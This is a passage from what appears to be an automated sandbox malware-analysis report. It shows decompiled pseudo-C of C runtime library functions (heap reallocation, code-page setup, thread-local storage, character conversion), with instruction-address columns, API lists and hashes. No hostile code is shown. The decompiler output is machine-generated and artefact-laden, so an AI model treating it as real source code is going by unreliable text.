						_t84 = _t13;
						while(1) {
							__eflags = _t69 - _t84;
							if(_t69 >= _t84) {
								break;
							}
							 *(_t69 + 4) =  *(_t69 + 4) & 0x00000000;
							 *_t69 =  *_t69 | 0xffffffff;
							 *(_t69 + 8) =  *(_t69 + 8) & 0x00000000;
							 *((char*)(_t69 + 5)) = 0xa;
							_t69 = _t69 + 0x24;
							_t84 =  *_t92 + 0x480;
						}
						_t92 =  &(_t92[1]);
						__eflags =  *0x425a00 - _t88; // 0x20
						if(__eflags < 0) {
							continue;
						}
						goto L18;
					}
					_t88 =  *0x425a00; // 0x20
					goto L18;
				}
			}




























                              0x00417654
                              0x00417659
                              0x0041765d
                              0x00417662
                              0x00417663
                              0x00417669
                              0x00417673
                              0x00417673
                              0x00417679
                              0x0041767d
                              0x00417681
                              0x00417684
                              0x00417688
                              0x0041768c
                              0x00417691
                              0x00417694
                              0x00417694
                              0x0041769f
                              0x004176a5
                              0x004176aa
                              0x00417781
                              0x00417781
                              0x00417781
                              0x00417783
                              0x00417783
                              0x00417789
                              0x0041778c
                              0x00417790
                              0x00417793
                              0x004177e2
                              0x004177e2
                              0x004177e2
                              0x00000000
                              0x004177e2
                              0x00417795
                              0x00417797
                              0x0041779b
                              0x004177a7
                              0x004177a9
                              0x004177a9
                              0x0041779d
                              0x0041779f
                              0x0041779f
                              0x004177b3
                              0x004177b5
                              0x004177b8
                              0x004177d1
                              0x004177d1
                              0x004177ba
                              0x004177bb
                              0x004177c1
                              0x004177c3
                              0x00000000
                              0x00000000
                              0x004177c5
                              0x004177ca
                              0x004177cc
                              0x004177cf
                              0x004177d7
                              0x004177da
                              0x004177dc
                              0x004177dc
                              0x00000000
                              0x004177da
                              0x00000000
                              0x004177cf
                              0x004177e6
                              0x004177e6
                              0x004177e7
                              0x004177e7
                              0x004177fc
                              0x004177fc
                              0x004176b0
                              0x004176b3
                              0x004176b5
                              0x00000000
                              0x00000000
                              0x004176bb
                              0x004176bd
                              0x004176c3
                              0x004176cb
                              0x004176cd
                              0x004176cf
                              0x004176cf
                              0x004176d1
                              0x004176d7
                              0x0041772f
                              0x0041772f
                              0x00417731
                              0x00417733
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00417735
                              0x00417735
                              0x00417738
                              0x0041773a
                              0x0041773d
                              0x00000000
                              0x00000000
                              0x0041773f
                              0x00417741
                              0x00417743
                              0x00000000
                              0x00000000
                              0x00417745
                              0x00417747
                              0x00417754
                              0x0041775b
                              0x0041775b
                              0x00417768
                              0x00417770
                              0x00417774
                              0x00000000
                              0x00417774
                              0x0041774a
                              0x00417750
                              0x00417752
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00417777
                              0x00417777
                              0x0041777b
                              0x0041777c
                              0x0041777d
                              0x0041777d
                              0x00000000
                              0x004176d9
                              0x004176d9
                              0x004176de
                              0x004176e3
                              0x004176e8
                              0x004176eb
                              0x00000000
                              0x00000000
                              0x004176ed
                              0x004176ed
                              0x004176f4
                              0x004176f6
                              0x004176f6
                              0x004176fc
                              0x004176fc
                              0x004176fe
                              0x00000000
                              0x00000000
                              0x00417700
                              0x00417704
                              0x00417707
                              0x0041770b
                              0x00417711
                              0x00417714
                              0x00417714
                              0x0041771c
                              0x0041771f
                              0x00417725
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00417727
                              0x00417729
                              0x00000000
                              0x00417729

                              APIs
                              • GetStartupInfoA.KERNEL32(?), ref: 0041769F
                              • GetFileType.KERNEL32(?,?,00000000), ref: 0041774A
                              • GetStdHandle.KERNEL32(-000000F6,?,00000000), ref: 004177AD
                              • GetFileType.KERNEL32(00000000,?,00000000), ref: 004177BB
                              • SetHandleCount.KERNEL32 ref: 004177F2
                              Memory Dump Source
                              • Source File: 00000001.00000002.490014398.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.490004382.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490039996.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490058579.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490070419.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490097173.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490153822.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                              Similarity
                              • API ID: FileHandleType$CountInfoStartup
                              • String ID:
                              • API String ID: 1710529072-0
                              • Opcode ID: 8c6679148f64bb77278d6d77b9368511d7cfe70b0cd8573ea2dfe0e7b80ae48f
                              • Instruction ID: 1521dec5194d53324a877df202082dadc936f581ec6971422c000dc394b087b4
                              • Opcode Fuzzy Hash: 8c6679148f64bb77278d6d77b9368511d7cfe70b0cd8573ea2dfe0e7b80ae48f
                              • Instruction Fuzzy Hash: 39510B716086458FC7208B28D8847A67BB0FB11378F65866ED5B2C72E0D738A886C759
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00403AA7 Relevance: 7.6, APIs: 5, Instructions: 57COMMONLIBRARYCODE
                              Download Yara Rule
                              C-Code - Quality: 83%
                              			E00403AA7(signed int __ecx) {
				short _v6;
				char _v12;
				short _t12;
				short _t27;
				int _t29;
				void* _t30;

				_push(__ecx);
				_push(__ecx);
				_v6 = __ecx;
				if(__ecx != 0) {
					_t27 = CharUpperW(__ecx & 0x0000ffff);
					if(_t27 != 0 || GetLastError() != 0x78) {
						_t12 = _t27;
					} else {
						_t29 = WideCharToMultiByte(0, 0,  &_v6, 1,  &_v12, 4, 0, 0);
						if(_t29 != 0 && _t29 <= 4) {
							 *((char*)(_t30 + _t29 - 8)) = 0;
							CharUpperA( &_v12);
							MultiByteToWideChar(0, 0,  &_v12, _t29,  &_v6, 1);
						}
						_t12 = _v6;
					}
				} else {
					_t12 = 0;
				}
				return _t12;
			}









                              0x00403aaa
                              0x00403aab
                              0x00403ab3
                              0x00403ab7
                              0x00403ac8
                              0x00403acc
                              0x00403b21
                              0x00403ad9
                              0x00403aef
                              0x00403af3
                              0x00403afd
                              0x00403b02
                              0x00403b15
                              0x00403b15
                              0x00403b1b
                              0x00403b1b
                              0x00403ab9
                              0x00403ab9
                              0x00403ab9
                              0x00403b27

                              APIs
                              • CharUpperW.USER32(00000000,00000000,?,00000000,00000000,?,00403B6F), ref: 00403AC2
                              • GetLastError.KERNEL32(?,00000000,00000000,?,00403B6F), ref: 00403ACE
                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,?,00000004,00000000,00000000,?,00000000,00000000,?,00403B6F), ref: 00403AE9
                              • CharUpperA.USER32(?,?,00000000,00000000,?,00403B6F), ref: 00403B02
                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,?,00000001,?,00000000,00000000,?,00403B6F), ref: 00403B15
                              Memory Dump Source
                              • Source File: 00000001.00000002.490014398.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.490004382.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490039996.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490058579.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490070419.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490097173.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490153822.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                              Similarity
                              • API ID: Char$ByteMultiUpperWide$ErrorLast
                              • String ID:
                              • API String ID: 3939315453-0
                              • Opcode ID: 209c94fe8e33f847f2405d3a9712247a1b8bb9216b5908a8917fe0bd7a80c077
                              • Instruction ID: 0842cb939f6927aecb542cd9758d214692c03acffe84293a02396fd76ee0080f
                              • Opcode Fuzzy Hash: 209c94fe8e33f847f2405d3a9712247a1b8bb9216b5908a8917fe0bd7a80c077
                              • Instruction Fuzzy Hash: B30144B65001197ADB20ABE49CC9DEBBA7CDB08259F414572F942A3281E3756E4487B8
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00415523 Relevance: 7.5, APIs: 5, Instructions: 38threadCOMMON
                              Download Yara Rule
                              C-Code - Quality: 100%
                              			E00415523() {
				void _t10;
				long _t15;
				void* _t16;

				_t15 = GetLastError();
				_t16 = TlsGetValue( *0x420740);
				if(_t16 == 0) {
					_t16 = E00416EFC(1, 0x74);
					if(_t16 == 0 || TlsSetValue( *0x420740, _t16) == 0) {
						E00414C0C(0x10);
					} else {
						E00415510(_t16);
						_t10 = GetCurrentThreadId();
						 *(_t16 + 4) =  *(_t16 + 4) | 0xffffffff;
						 *_t16 = _t10;
					}
				}
				SetLastError(_t15);
				return _t16;
			}






                              0x00415531
                              0x00415539
                              0x0041553d
                              0x00415548
                              0x0041554e
                              0x00415578
                              0x00415561
                              0x00415562
                              0x00415568
                              0x0041556e
                              0x00415572
                              0x00415572
                              0x0041554e
                              0x0041557f
                              0x00415589

                              APIs
                              • GetLastError.KERNEL32(00000103,7FFFFFFF,00416EEF,00417BBE,00000000,?,?,00000000,00000001), ref: 00415525
                              • TlsGetValue.KERNEL32(?,?,00000000,00000001), ref: 00415533
                              • SetLastError.KERNEL32(00000000,?,?,00000000,00000001), ref: 0041557F
                                • Part of subcall function 00416EFC: HeapAlloc.KERNEL32(00000008,?,00000000,00000000,00000001,00415548,00000001,00000074,?,?,00000000,00000001), ref: 00416FF2
                              • TlsSetValue.KERNEL32(00000000,?,?,00000000,00000001), ref: 00415557
                              • GetCurrentThreadId.KERNEL32 ref: 00415568
                              Memory Dump Source
                              • Source File: 00000001.00000002.490014398.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.490004382.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490039996.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490058579.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490070419.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490097173.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490153822.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                              Similarity
                              • API ID: ErrorLastValue$AllocCurrentHeapThread
                              • String ID:
                              • API String ID: 2020098873-0
                              • Opcode ID: 86968800811f432393852c2012b1ac292949c56105930e45964c9f1db916a728
                              • Instruction ID: cede6b9146d9eee740ee2dfbc4b23865fcca372efd47330e9e203dd76af2c63a
                              • Opcode Fuzzy Hash: 86968800811f432393852c2012b1ac292949c56105930e45964c9f1db916a728
                              • Instruction Fuzzy Hash: 09F09635A01611BBC7312B74AC096DB3E62EB857A1B51413AF551962A4DB28888196EC
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00417E3A Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 143COMMON
                              Download Yara Rule
                              C-Code - Quality: 92%
                              			E00417E3A(int _a4) {
				signed int _v8;
				char _v21;
				char _v22;
				struct _cpinfo _v28;
				void* __ebx;
				void* __edi;
				intOrPtr* _t36;
				signed int _t40;
				signed int _t41;
				int _t43;
				signed int _t47;
				signed int _t49;
				int _t50;
				signed char* _t51;
				signed int _t55;
				signed char* _t57;
				signed int _t60;
				intOrPtr* _t63;
				signed int _t65;
				signed char _t66;
				signed char _t68;
				signed char _t69;
				signed int _t70;
				void* _t71;
				signed int _t74;
				signed int _t77;
				signed int _t79;
				signed int _t81;
				void* _t85;

				E0041570A(0x19);
				_t50 = E00417FE7(_a4);
				_t85 = _t50 -  *0x4256c8; // 0x4e4
				_a4 = _t50;
				if(_t85 != 0) {
					__eflags = _t50;
					if(_t50 == 0) {
						L30:
						E00418064();
					} else {
						_t65 = 0;
						__eflags = 0;
						_t36 = 0x422af8;
						while(1) {
							__eflags =  *_t36 - _t50;
							if( *_t36 == _t50) {
								break;
							}
							_t36 = _t36 + 0x30;
							_t65 = _t65 + 1;
							__eflags = _t36 - 0x422be8;
							if(_t36 < 0x422be8) {
								continue;
							} else {
								_t43 = GetCPInfo(_t50,  &_v28);
								_t81 = 1;
								__eflags = _t43 - _t81;
								if(_t43 != _t81) {
									__eflags =  *0x423510;
									if( *0x423510 == 0) {
										_t77 = _t81 | 0xffffffff;
										__eflags = _t77;
									} else {
										goto L30;
									}
								} else {
									 *0x4258e4 =  *0x4258e4 & 0x00000000;
									_t60 = 0x40;
									__eflags = _v28 - _t81;
									memset(0x4257e0, 0, _t60 << 2);
									asm("stosb");
									 *0x4256c8 = _t50;
									if(__eflags <= 0) {
										 *0x4256dc =  *0x4256dc & 0x00000000;
										__eflags =  *0x4256dc;
									} else {
										__eflags = _v22;
										if(_v22 != 0) {
											_t63 =  &_v21;
											while(1) {
												_t69 =  *_t63;
												__eflags = _t69;
												if(_t69 == 0) {
													goto L24;
												}
												_t49 =  *(_t63 - 1) & 0x000000ff;
												_t70 = _t69 & 0x000000ff;
												while(1) {
													__eflags = _t49 - _t70;
													if(_t49 > _t70) {
														break;
													}
													 *(_t49 + 0x4257e1) =  *(_t49 + 0x4257e1) | 0x00000004;
													_t49 = _t49 + 1;
												}
												_t63 = _t63 + 2;
												__eflags =  *(_t63 - 1);
												if( *(_t63 - 1) != 0) {
													continue;
												}
												goto L24;
											}
										}
										L24:
										_t47 = _t81;
										do {
											 *(_t47 + 0x4257e1) =  *(_t47 + 0x4257e1) | 0x00000008;
											_t47 = _t47 + 1;
											__eflags = _t47 - 0xff;
										} while (_t47 < 0xff);
										 *0x4258e4 = E00418031(_t50);
										 *0x4256dc = _t81;
									}
									_t71 = 0x4256d0;
									asm("stosd");
									asm("stosd");
									asm("stosd");
									L31:
									E0041808D(_t50, _t71);
									goto L1;
								}
							}
							goto L33;
						}
						_v8 = _v8 & 0x00000000;
						_t55 = 0x40;
						memset(0x4257e0, 0, _t55 << 2);
						_t79 = _t65 + _t65 * 2 << 4;
						__eflags = _t79;
						asm("stosb");
						_t16 = _t79 + 0x422b08; // 0x422b08
						_t51 = _t16;
						do {
							__eflags =  *_t51;
							_t57 = _t51;
							if( *_t51 != 0) {
								while(1) {
									_t17 =  &(_t57[1]); // 0xdf
									_t66 =  *_t17;
									__eflags = _t66;
									if(_t66 == 0) {
										goto L21;
									}
									_t41 =  *_t57 & 0x000000ff;
									_t74 = _t66 & 0x000000ff;
									__eflags = _t41 - _t74;
									if(_t41 <= _t74) {
										_t19 = _v8 + 0x422af0; // 0x8040201
										_t68 =  *_t19;
										do {
											 *(_t41 + 0x4257e1) =  *(_t41 + 0x4257e1) | _t68;
											_t41 = _t41 + 1;
											__eflags = _t41 - _t74;
										} while (_t41 <= _t74);
									}
									_t57 =  &(_t57[2]);
									__eflags =  *_t57;
									if( *_t57 != 0) {
										continue;
									}
									goto L21;
								}
							}
							L21:
							_v8 = _v8 + 1;
							_t51 =  &(_t51[8]);
							__eflags = _v8 - 4;
						} while (_v8 < 4);
						 *0x4256dc = 1;
						 *0x4256c8 = _a4;
						_t40 = E00418031(_a4);
						_t71 = 0x4256d0;
						asm("movsd");
						asm("movsd");
						 *0x4258e4 = _t40;
						asm("movsd");
					}
					goto L31;
				} else {
					L1:
					_t77 = 0;
				}
				L33:
				E0041576B(0x19);
				return _t77;
			}
































                              0x00417e45
                              0x00417e52
                              0x00417e55
                              0x00417e5c
                              0x00417e5f
                              0x00417e68
                              0x00417e6a
                              0x00417fc6
                              0x00417fc6
                              0x00417e70
                              0x00417e70
                              0x00417e70
                              0x00417e72
                              0x00417e77
                              0x00417e77
                              0x00417e79
                              0x00000000
                              0x00000000
                              0x00417e7b
                              0x00417e7e
                              0x00417e7f
                              0x00417e84
                              0x00000000
                              0x00417e86
                              0x00417e8b
                              0x00417e93
                              0x00417e94
                              0x00417e96
                              0x00417fbd
                              0x00417fc4
                              0x00417fd5
                              0x00417fd5
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00417e9c
                              0x00417e9e
                              0x00417ea5
                              0x00417ead
                              0x00417eb0
                              0x00417eb2
                              0x00417eb3
                              0x00417eb9
                              0x00417faa
                              0x00417faa
                              0x00417ebf
                              0x00417ebf
                              0x00417ec3
                              0x00417ec9
                              0x00417ecc
                              0x00417ecc
                              0x00417ece
                              0x00417ed0
                              0x00000000
                              0x00000000
                              0x00417ed6
                              0x00417eda
                              0x00417edd
                              0x00417edd
                              0x00417edf
                              0x00000000
                              0x00000000
                              0x00417ee5
                              0x00417eec
                              0x00417eec
                              0x00417f7a
                              0x00417f7b
                              0x00417f7f
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00417f7f
                              0x00417ecc
                              0x00417f85
                              0x00417f85
                              0x00417f87
                              0x00417f87
                              0x00417f8e
                              0x00417f8f
                              0x00417f8f
                              0x00417f9d
                              0x00417fa2
                              0x00417fa2
                              0x00417fb3
                              0x00417fb8
                              0x00417fb9
                              0x00417fba
                              0x00417fcb
                              0x00417fcb
                              0x00000000
                              0x00417fcb
                              0x00417e96
                              0x00000000
                              0x00417e84
                              0x00417eef
                              0x00417ef5
                              0x00417f00
                              0x00417f02
                              0x00417f02
                              0x00417f05
                              0x00417f06
                              0x00417f06
                              0x00417f0c
                              0x00417f0c
                              0x00417f0f
                              0x00417f11
                              0x00417f13
                              0x00417f13
                              0x00417f13
                              0x00417f16
                              0x00417f18
                              0x00000000
                              0x00000000
                              0x00417f1a
                              0x00417f1d
                              0x00417f20
                              0x00417f22
                              0x00417f27
                              0x00417f27
                              0x00417f2d
                              0x00417f2d
                              0x00417f33
                              0x00417f34
                              0x00417f34
                              0x00417f2d
                              0x00417f39
                              0x00417f3a
                              0x00417f3d
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00417f3d
                              0x00417f13
                              0x00417f3f
                              0x00417f3f
                              0x00417f42
                              0x00417f45
                              0x00417f45
                              0x00417f4e
                              0x00417f59
                              0x00417f5e
                              0x00417f69
                              0x00417f6e
                              0x00417f6f
                              0x00417f71
                              0x00417f76
                              0x00417f76
                              0x00000000
                              0x00417e61
                              0x00417e61
                              0x00417e61
                              0x00417e61
                              0x00417fd8
                              0x00417fda
                              0x00417fe6

                              APIs
                                • Part of subcall function 0041570A: InitializeCriticalSection.KERNEL32(00000000,00000000,?,?,00416FB2,00000009,00000000,00000000,00000001,00415548,00000001,00000074,?,?,00000000,00000001), ref: 00415747
                                • Part of subcall function 0041570A: EnterCriticalSection.KERNEL32(?,?,?,00416FB2,00000009,00000000,00000000,00000001,00415548,00000001,00000074,?,?,00000000,00000001), ref: 00415762
                              • GetCPInfo.KERNEL32(00000000,?,?,00000000,00000000,?,?,00414BA4), ref: 00417E8B
                                • Part of subcall function 0041576B: LeaveCriticalSection.KERNEL32(?,00413F70,00000009,00413F5C,00000000,?,00000000,00000000,00000000), ref: 00415778
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.490014398.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.490004382.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490039996.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490058579.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490070419.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490097173.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490153822.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                              Similarity
                              • API ID: CriticalSection$EnterInfoInitializeLeave
                              • String ID: +B$WB$WB
                              • API String ID: 1866836854-4076192905
                              • Opcode ID: ee95e9d0b24a19a0cc788d9683df54c17a7a80f6c3da06404699baeb333cbe61
                              • Instruction ID: 91cfe2518806d3d9ee68befd2fe7c4d9c34af4d87c59522c175cbc6726151178
                              • Opcode Fuzzy Hash: ee95e9d0b24a19a0cc788d9683df54c17a7a80f6c3da06404699baeb333cbe61
                              • Instruction Fuzzy Hash: FC41243164C654AEE720DB24D8853EB7BF1AB05314FB4406BE5488B291CABD49C7C74C
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0041458F Relevance: 6.5, APIs: 5, Instructions: 278COMMON
                              Download Yara Rule
                              C-Code - Quality: 68%
                              			E0041458F(void* _a4, long _a8) {
				signed int _v8;
				intOrPtr _v20;
				long _v36;
				void* _v40;
				intOrPtr _v44;
				char _v48;
				long _v52;
				long _v56;
				char _v60;
				intOrPtr _t56;
				void* _t57;
				long _t58;
				long _t59;
				long _t63;
				long _t66;
				long _t68;
				long _t71;
				long _t72;
				long _t74;
				long _t78;
				intOrPtr _t80;
				void* _t83;
				long _t85;
				long _t88;
				void* _t89;
				long _t91;
				intOrPtr _t93;
				void* _t97;
				void* _t104;
				long _t113;
				long _t116;
				intOrPtr _t122;
				void* _t123;

				_push(0xffffffff);
				_push(0x41b9b8);
				_push(E00414A2C);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t122;
				_t123 = _t122 - 0x28;
				_t97 = _a4;
				_t113 = 0;
				if(_t97 != 0) {
					_t116 = _a8;
					__eflags = _t116;
					if(_t116 != 0) {
						_t56 =  *0x425a38; // 0x1
						__eflags = _t56 - 3;
						if(_t56 != 3) {
							__eflags = _t56 - 2;
							if(_t56 != 2) {
								while(1) {
									_t57 = 0;
									__eflags = _t116 - 0xffffffe0;
									if(_t116 <= 0xffffffe0) {
										__eflags = _t116 - _t113;
										if(_t116 == _t113) {
											_t116 = 1;
										}
										_t116 = _t116 + 0x0000000f & 0xfffffff0;
										__eflags = _t116;
										_t57 = HeapReAlloc( *0x425a34, _t113, _t97, _t116);
									}
									__eflags = _t57 - _t113;
									if(_t57 != _t113) {
										goto L64;
									}
									__eflags =  *0x4233b4 - _t113; // 0x0
									if(__eflags == 0) {
										goto L64;
									}
									_t58 = E00415868(_t116);
									__eflags = _t58;
									if(_t58 != 0) {
										continue;
									}
									goto L63;
								}
								goto L64;
							}
							__eflags = _t116 - 0xffffffe0;
							if(_t116 <= 0xffffffe0) {
								__eflags = _t116;
								if(_t116 <= 0) {
									_t116 = 0x10;
								} else {
									_t116 = _t116 + 0x0000000f & 0xfffffff0;
								}
								_a8 = _t116;
							}
							while(1) {
								_v40 = _t113;
								__eflags = _t116 - 0xffffffe0;
								if(_t116 <= 0xffffffe0) {
									E0041570A(9);
									_pop(_t104);
									_v8 = 1;
									_t63 = E004167F8(_t97,  &_v60,  &_v48);
									_t123 = _t123 + 0xc;
									_t113 = _t63;
									_v52 = _t113;
									__eflags = _t113;
									if(_t113 == 0) {
										_v40 = HeapReAlloc( *0x425a34, 0, _t97, _t116);
									} else {
										__eflags = _t116 -  *0x42283c; // 0x1e0
										if(__eflags < 0) {
											_t100 = _t116 >> 4;
											_t71 = E00416BC0(_t104, _v60, _v48, _t113, _t116 >> 4);
											_t123 = _t123 + 0x10;
											__eflags = _t71;
											if(_t71 == 0) {
												_t72 = E00416894(_t104, _t100);
												_v40 = _t72;
												__eflags = _t72;
												if(_t72 != 0) {
													_t74 = ( *_t113 & 0x000000ff) << 4;
													_v56 = _t74;
													__eflags = _t74 - _t116;
													if(_t74 >= _t116) {
														_t74 = _t116;
													}
													E00414090(_v40, _a4, _t74);
													E0041684F(_v60, _v48, _t113);
													_t123 = _t123 + 0x18;
												}
											} else {
												_v40 = _a4;
											}
											_t97 = _a4;
										}
										__eflags = _v40;
										if(_v40 == 0) {
											_t66 = HeapAlloc( *0x425a34, 0, _t116);
											_v40 = _t66;
											__eflags = _t66;
											if(_t66 != 0) {
												_t68 = ( *_t113 & 0x000000ff) << 4;
												_v56 = _t68;
												__eflags = _t68 - _t116;
												if(_t68 >= _t116) {
													_t68 = _t116;
												}
												E00414090(_v40, _t97, _t68);
												E0041684F(_v60, _v48, _t113);
												_t123 = _t123 + 0x18;
											}
										}
									}
									_t51 =  &_v8;
									 *_t51 = _v8 | 0xffffffff;
									__eflags =  *_t51;
									E00414868();
								}
								_t57 = _v40;
								__eflags = _t57 - _t113;
								if(_t57 != _t113) {
									goto L64;
								}
								__eflags =  *0x4233b4 - _t113; // 0x0
								if(__eflags == 0) {
									goto L64;
								}
								_t59 = E00415868(_t116);
								__eflags = _t59;
								if(_t59 != 0) {
									continue;
								}
								goto L63;
							}
							goto L64;
						} else {
							goto L5;
						}
						do {
							L5:
							_v40 = _t113;
							__eflags = _t116 - 0xffffffe0;
							if(_t116 > 0xffffffe0) {
								L25:
								_t57 = _v40;
								__eflags = _t57 - _t113;
								if(_t57 != _t113) {
									goto L64;
								}
								__eflags =  *0x4233b4 - _t113; // 0x0
								if(__eflags == 0) {
									goto L64;
								}
								goto L27;
							}
							E0041570A(9);
							_v8 = _t113;
							_t80 = E00415A9D(_t97);
							_v44 = _t80;
							__eflags = _t80 - _t113;
							if(_t80 == _t113) {
								L21:
								_v8 = _v8 | 0xffffffff;
								E0041471A();
								__eflags = _v44 - _t113;
								if(_v44 == _t113) {
									__eflags = _t116 - _t113;
									if(_t116 == _t113) {
										_t116 = 1;
									}
									_t116 = _t116 + 0x0000000f & 0xfffffff0;
									__eflags = _t116;
									_a8 = _t116;
									_v40 = HeapReAlloc( *0x425a34, _t113, _t97, _t116);
								}
								goto L25;
							}
							__eflags = _t116 -  *0x425a30; // 0x0
							if(__eflags <= 0) {
								_push(_t116);
								_push(_t97);
								_push(_t80);
								_t88 = E004162A6();
								_t123 = _t123 + 0xc;
								__eflags = _t88;
								if(_t88 == 0) {
									_push(_t116);
									_t89 = E00415DF1();
									_v40 = _t89;
									__eflags = _t89 - _t113;
									if(_t89 != _t113) {
										_t91 =  *((intOrPtr*)(_t97 - 4)) - 1;
										_v36 = _t91;
										__eflags = _t91 - _t116;
										if(_t91 >= _t116) {
											_t91 = _t116;
										}
										E00414090(_v40, _t97, _t91);
										_t93 = E00415A9D(_t97);
										_v44 = _t93;
										_push(_t97);
										_push(_t93);
										E00415AC8();
										_t123 = _t123 + 0x18;
									}
								} else {
									_v40 = _t97;
								}
							}
							__eflags = _v40 - _t113;
							if(_v40 == _t113) {
								__eflags = _t116 - _t113;
								if(_t116 == _t113) {
									_t116 = 1;
									_a8 = _t116;
								}
								_t116 = _t116 + 0x0000000f & 0xfffffff0;
								_a8 = _t116;
								_t83 = HeapAlloc( *0x425a34, _t113, _t116);
								_v40 = _t83;
								__eflags = _t83 - _t113;
								if(_t83 != _t113) {
									_t85 =  *((intOrPtr*)(_t97 - 4)) - 1;
									_v36 = _t85;
									__eflags = _t85 - _t116;
									if(_t85 >= _t116) {
										_t85 = _t116;
									}
									E00414090(_v40, _t97, _t85);
									_push(_t97);
									_push(_v44);
									E00415AC8();
									_t123 = _t123 + 0x14;
								}
							}
							goto L21;
							L27:
							_t78 = E00415868(_t116);
							__eflags = _t78;
						} while (_t78 != 0);
						goto L63;
					} else {
						E00413F9F(_t97);
						L63:
						_t57 = 0;
						__eflags = 0;
						goto L64;
					}
				} else {
					_t57 = E00413E65(_a8);
					L64:
					 *[fs:0x0] = _v20;
					return _t57;
				}
			}




































                              0x00414592
                              0x00414594
                              0x00414599
                              0x004145a4
                              0x004145a5
                              0x004145ac
                              0x004145b2
                              0x004145b5
                              0x004145b9
                              0x004145c9
                              0x004145cc
                              0x004145ce
                              0x004145dc
                              0x004145e1
                              0x004145e4
                              0x00414723
                              0x00414726
                              0x00414873
                              0x00414873
                              0x00414875
                              0x00414878
                              0x0041487a
                              0x0041487c
                              0x00414880
                              0x00414880
                              0x00414884
                              0x00414884
                              0x00414890
                              0x00414890
                              0x00414896
                              0x00414898
                              0x00000000
                              0x00000000
                              0x0041489a
                              0x004148a0
                              0x00000000
                              0x00000000
                              0x004148a3
                              0x004148a9
                              0x004148ab
                              0x00000000
                              0x00000000
                              0x00000000
                              0x004148ab
                              0x00000000
                              0x00414873
                              0x0041472c
                              0x0041472f
                              0x00414731
                              0x00414733
                              0x0041473f
                              0x00414735
                              0x00414738
                              0x00414738
                              0x00414740
                              0x00414740
                              0x00414743
                              0x00414743
                              0x00414746
                              0x00414749
                              0x00414751
                              0x00414756
                              0x00414757
                              0x00414767
                              0x0041476c
                              0x0041476f
                              0x00414771
                              0x00414774
                              0x00414776
                              0x00414836
                              0x0041477c
                              0x0041477c
                              0x00414782
                              0x00414786
                              0x00414791
                              0x00414796
                              0x00414799
                              0x0041479b
                              0x004147a6
                              0x004147ac
                              0x004147af
                              0x004147b1
                              0x004147b6
                              0x004147b9
                              0x004147bc
                              0x004147be
                              0x004147c0
                              0x004147c0
                              0x004147c9
                              0x004147d5
                              0x004147da
                              0x004147da
                              0x0041479d
                              0x004147a0
                              0x004147a0
                              0x004147dd
                              0x004147dd
                              0x004147e0
                              0x004147e4
                              0x004147ef
                              0x004147f5
                              0x004147f8
                              0x004147fa
                              0x004147ff
                              0x00414802
                              0x00414805
                              0x00414807
                              0x00414809
                              0x00414809
                              0x00414810
                              0x0041481c
